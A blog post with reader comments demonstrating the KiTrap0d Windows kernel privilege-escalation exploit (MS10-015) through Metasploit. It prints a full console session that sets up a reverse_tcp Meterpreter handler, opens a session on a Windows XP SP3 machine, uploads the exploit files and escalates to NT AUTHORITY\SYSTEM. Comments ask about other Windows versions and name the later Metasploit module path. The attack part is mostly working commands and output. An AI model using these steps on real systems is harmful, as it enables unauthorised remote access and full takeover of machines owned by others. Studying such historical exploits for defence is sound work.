more for documentation and historical purposes than "new hotness"
original advisory
http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
"Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack"
Now implemented in Metasploit
msf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler on port 443
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.100:443 -> 192.168.1.200:50777)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > sysinfo
Computer: WINXPSP3
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter > run ki
run killav run kitrap0d
meterpreter > run kitrap0d
[*] Currently running as WINXPSP3\user
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1128)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x29142 bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316
[?] OpenProcess(1316) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7cc, INFINITE);
[?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
**Nipple Rub...**
Did anyone try it against windows 2003, R2 Sp1.
ReplyDeletedidn't work for me.
I dont have a release 2 but i think i have en 2k3 Ent SP1. i'll try that.
ReplyDeleteWhere should i put the KiTrap0D.zip file, for it to run?
ReplyDeletethis is an old post before the built kitrap0d into meterperter. you can call it and some others via getsystem and the new post modules
ReplyDeleteFrom the future, 2015. You now have to use "use exploit/windows/local/ms10_015_kitrap0d" local exploit to abuse the NTVDM.
ReplyDelete